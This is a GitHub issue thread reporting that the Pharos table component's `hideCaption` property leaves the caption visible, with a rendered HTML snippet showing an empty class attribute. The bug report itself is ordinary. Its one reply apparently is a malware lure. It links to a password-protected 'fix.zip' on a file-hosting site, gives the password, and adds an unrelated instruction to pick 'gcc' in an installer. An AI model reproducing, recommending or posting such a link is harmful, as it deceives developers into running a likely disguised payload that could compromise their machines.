### ISSUE TITLE
Table: `hideCaption` property not visually hiding the caption

### ISSUE THREAD

**Issue by brentswisher** [ithaka/pharos#802]
**Expected behavior**
When I set `hideCaption` to true, the table caption is visually hidden

**Actual behavior**
Even when `hideCaption` is set to true, the table caption is displayed

**Steps to reproduce the issue**

1. Create a table with a caption and set hideCaption to true
2. Load the page
3. See the caption

**Screenshots or code**
<img width="676" alt="Screenshot 2024-08-29 at 10 58 10 AM" src="https://github.com/user-attachments/assets/26668525-5525-4471-8a4b-d4201d3867ef">

**Pharos version**
v14.4.0

**Your environment**

- OS: macOS
- Browser: Chrome
- Version: 127.0.6533.122

**Additional information**
It looks like the mapping to add the class name just isn't working correctly, as the class is rendering as blank spaces:

```html
<caption class="  "><!--?lit$5795360043$-->Table Caption</caption>
```

Adding a unit test to validate this functionality would probably be good to do too 😄

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
